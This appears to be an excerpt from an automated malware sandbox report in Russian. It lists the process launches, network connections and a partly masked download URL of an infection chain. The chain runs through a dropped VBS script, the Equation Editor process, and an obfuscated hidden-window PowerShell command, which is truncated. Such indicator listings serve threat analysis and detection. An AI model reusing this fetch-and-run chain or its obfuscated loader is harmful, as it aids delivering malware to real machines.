Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\decenthonezmilkbuttersockhs.vBS"
- %APPDATA%\decenthonezmilkbuttersockhs.vbs
- '45.##6.253.157':80
- 'ia#####4.us.archive.org':443
- http://45.##6.253.157/NED/decenthonezmilkbuttersockh.tIF
- 'ia#####4.us.archive.org':443
- DNS ASK ia#####4.us.archive.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J⼝ ⚟ ⒞ ⭋ ⨲Bp⼝ ⚟ ⒞ ⭋ ⨲G0⼝ ⚟ ⒞ ⭋ ⨲YQBn⼝ ⚟ ⒞ ⭋ ⨲GU⼝ ⚟ ⒞ ⭋ ⨲VQBy⼝ ⚟ ⒞ ⭋ ⨲Gw⼝ ⚟ ⒞ ⭋ ⨲I⼝ ⚟ ⒞ ⭋ ⨲⼝ ⚟ ⒞ ⭋ ⨲9⼝ ⚟ ⒞ ⭋ ⨲C⼝ ⚟ ⒞ ⭋ ⨲⼝ ⚟ ⒞ ⭋ ⨲JwBo⼝ ⚟ ⒞ ⭋ ⨲HQ⼝ ⚟ ⒞ ⭋ ⨲d⼝ ⚟ ⒞ ⭋ ⨲Bw⼝ ⚟ ⒞ ⭋ ⨲... (со скрытым окном)